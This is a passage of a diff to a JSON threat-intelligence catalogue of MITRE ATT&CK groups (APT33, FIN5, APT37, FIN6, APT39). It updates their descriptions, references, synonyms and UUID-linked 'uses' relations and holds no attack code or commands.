"https://attack.mitre.org/groups/G0064", "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", - "https://www.brighttalk.com/webcast/10703/275683" + "https://www.brighttalk.com/webcast/10703/275683", + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage" ], "synonyms": [ - "APT33" + "APT33", + "Elfin" ] }, "related": [ @@ -8137,7 +9524,7 @@ "type": "uses" }, { - "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -8151,7 +9538,7 @@ "type": "uses" }, { - "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -8163,6 +9550,223 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "b4d80f8b-d2b9-4448-8844-4bef777ed676", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "90ac9266-68ce-46f2-b24f-5eb3b2a8ea38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3433a9e8-1c47-4320-b9bf-ed449061d1c3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cb69b20d-56d0-41ab-8440-4a4b251614d4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f5352566-1a64-49ac-8f7f-97e1d1a03300", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8901ac23-6b50-410c-b0dd-d8174a86f9b3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cf23bf4a-e003-4116-bbae-1ea6c558d565", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b76b2d94-60e4-4107-a903-4a3a7622fb3b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "13cd9151-83b7-410d-9f98-25d0f0d1d80d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e85cae1a-bce3-4ac4-b36b-b00acac0567b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "853c4192-4311-43e1-bfbb-b11b14911852", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b57c098-f043-4da2-83ef-7588a6d426bc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "fbd29c89-18ba-4c2d-b792-51c0adee049f", @@ -8222,6 +9826,13 @@ ], "type": "uses" }, + { + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ @@ -8230,7 +9841,7 @@ "type": "uses" }, { - "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -8249,13 +9860,6 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "7331c66a-5601-4d3f-acf6-ad9e3035eb40", @@ -8268,8 +9872,8 @@ "refs": [ "https://attack.mitre.org/groups/G0053", "https://www2.fireeye.com/WBNR-Are-you-ready-to-respond.html", - "https://www.darkreading.com/analytics/prolific-cybercrime-gang-favors-legit-login-credentials/d/d-id/1322645?", - "https://www.youtube.com/watch?v=fevGZs0EQu8" + "https://www.youtube.com/watch?v=fevGZs0EQu8", + "https://www.darkreading.com/analytics/prolific-cybercrime-gang-favors-legit-login-credentials/d/d-id/1322645?" ], "synonyms": [ "FIN5" @@ -8284,14 +9888,14 @@ "type": "uses" }, { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "dest-uuid": "6aabc5ec-eae6-422c-8311-38d45ee9838a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", + "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -8305,14 +9909,21 @@ "type": "uses" }, { - "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", + "dest-uuid": "9752aef4-a1f3-4328-929f-b64eb0536090", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -8333,49 +9944,14 @@ "type": "uses" }, { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6aabc5ec-eae6-422c-8311-38d45ee9838a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9752aef4-a1f3-4328-929f-b64eb0536090", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -8387,6 +9963,34 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "85403903-15e0-4f9f-9be4-a259ecad4022", @@ -8434,18 +10038,20 @@ "value": "Dragonfly - G0035" }, { - "description": "[APT37](https://attack.mitre.org/groups/G0067) is a suspected North Korean cyber espionage group that has been active since at least 2012. The group has targeted victims primarily in South Korea, but also in Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait, and other parts of the Middle East. [APT37](https://attack.mitre.org/groups/G0067) has also been linked to following campaigns between 2016-2018: Operation Daybreak, Operation Erebus, Golden Time, Evil New Year, Are you Happy?, FreeMilk, Northern Korean Human Rights, and Evil New Year 2018. (Citation: FireEye APT37 Feb 2018) (Citation: Securelist ScarCruft Jun 2016) (Citation: Talos Group123)", + "description": "[APT37](https://attack.mitre.org/groups/G0067) is a suspected North Korean cyber espionage group that has been active since at least 2012. The group has targeted victims primarily in South Korea, but also in Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait, and other parts of the Middle East. [APT37](https://attack.mitre.org/groups/G0067) has also been linked to following campaigns between 2016-2018: Operation Daybreak, Operation Erebus, Golden Time, Evil New Year, Are you Happy?, FreeMilk, Northern Korean Human Rights, and Evil New Year 2018. (Citation: FireEye APT37 Feb 2018) (Citation: Securelist ScarCruft Jun 2016) (Citation: Talos Group123)\n\nNorth Korean group definitions are known to have significant overlap, and the name [Lazarus Group](https://attack.mitre.org/groups/G0032) is known to encompass a broad range of activity. Some organizations use the name Lazarus Group to refer to any activity attributed to North Korea.(Citation: US-CERT HIDDEN COBRA June 2017) Some organizations track North Korean clusters or groups such as Bluenoroff,(Citation: Kaspersky Lazarus Under The Hood Blog 2017), [APT37](https://attack.mitre.org/groups/G0067), and [APT38](https://attack.mitre.org/groups/G0082) separately, while other organizations may track some activity associated with those group names by the name Lazarus Group.", "meta": { "external_id": "G0067", "refs": [ "https://attack.mitre.org/groups/G0067", - "https://securelist.com/operation-daybreak/75100/", "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf", - "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" + "https://securelist.com/operation-daybreak/75100/", + "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "https://www.us-cert.gov/ncas/alerts/TA17-164A", + "https://securelist.com/lazarus-under-the-hood/77908/" ], "synonyms": [ - "ScarCruft", "APT37", + "ScarCruft", "Reaper", "Group123", "TEMP.Reaper" @@ -8474,14 +10080,21 @@ "type": "uses" }, { - "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "60a9c2f0-b7a5-4e8e-959c-e1a3ff314a5f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -8502,77 +10115,7 @@ "type": "uses" }, { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0852567d-7958-4f4b-8947-4f840ec8d57d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "414dc555-c79e-4b24-a2da-9b607f7eaf16", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "211cfe9f-2676-4e1c-a5f5-2c8091da2a68", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "49abab73-3c5c-476e-afd5-69b5c732d845", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -8585,13 +10128,6 @@ ], "type": "uses" }, - { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ @@ -8600,56 +10136,21 @@ "type": "uses" }, { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "53d47b09-09c2-4015-8d37-6633ecd53f79", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "53a42597-1974-4b8e-84fd-3675e8992053", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -8663,28 +10164,28 @@ "type": "uses" }, { - "dest-uuid": "60a9c2f0-b7a5-4e8e-959c-e1a3ff314a5f", + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "dest-uuid": "53d47b09-09c2-4015-8d37-6633ecd53f79", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", + "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "dest-uuid": "53a42597-1974-4b8e-84fd-3675e8992053", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -8697,24 +10198,137 @@ ], "type": "uses" }, + { + "dest-uuid": "a2282af0-f9dd-4373-9b92-eaf9e11e0c71", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "414dc555-c79e-4b24-a2da-9b607f7eaf16", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "49abab73-3c5c-476e-afd5-69b5c732d845", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2e114e45-2c50-404c-804a-3af9564d240e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "4189a679-72ed-4a89-a57c-7f689712ecf8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0852567d-7958-4f4b-8947-4f840ec8d57d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "211cfe9f-2676-4e1c-a5f5-2c8091da2a68", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "4a2ce82e-1a74-468a-a6fb-bbead541383c", "value": "APT37 - G0067" }, { - "description": "[FIN6](https://attack.mitre.org/groups/G0037) is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces. This group has aggressively targeted and compromised point of sale (PoS) systems in the hospitality and retail sectors. (Citation: FireEye FIN6 April 2016)", + "description": "[FIN6](https://attack.mitre.org/groups/G0037) is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces. This group has aggressively targeted and compromised point of sale (PoS) systems in the hospitality and retail sectors.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)", "meta": { "external_id": "G0037", "refs": [ "https://attack.mitre.org/groups/G0037", - "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf" + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html" ], "synonyms": [ "FIN6" @@ -8736,7 +10350,7 @@ "type": "uses" }, { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -8750,28 +10364,7 @@ "type": "uses" }, { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -8785,42 +10378,7 @@ "type": "uses" }, { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -8840,6 +10398,34 @@ ], "type": "uses" }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "242f3da3-4425-4d11-8f5c-b842886da966", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", "tags": [ @@ -8847,6 +10433,34 @@ ], "type": "uses" }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ @@ -8855,7 +10469,49 @@ "type": "uses" }, { - "dest-uuid": "242f3da3-4425-4d11-8f5c-b842886da966", + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "5af7a825-2d9f-400d-931a-e00eb9e27f48", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -8922,6 +10578,239 @@ "uuid": "da49b9f1-ca99-443f-9728-0a074db66850", "value": "BlackOasis - G0063" }, + { + "description": "[APT39](https://attack.mitre.org/groups/G0087) is an Iranian cyber espionage group that has been active since at least 2014. They have targeted the telecommunication and travel industries to collect personal information that aligns with Iran's national priorities. (Citation: FireEye APT39 Jan 2019)(Citation: Symantec Chafer Dec 2015)", + "meta": { + "external_id": "G0087", + "refs": [ + "https://attack.mitre.org/groups/G0087", + "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html", + "https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets" + ], + "synonyms": [ + "APT39", + "Chafer" + ] + }, + "related": [ + { + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "242f3da3-4425-4d11-8f5c-b842886da966", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56f46b17-8cfa-46c0-b501-dd52fef394e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": 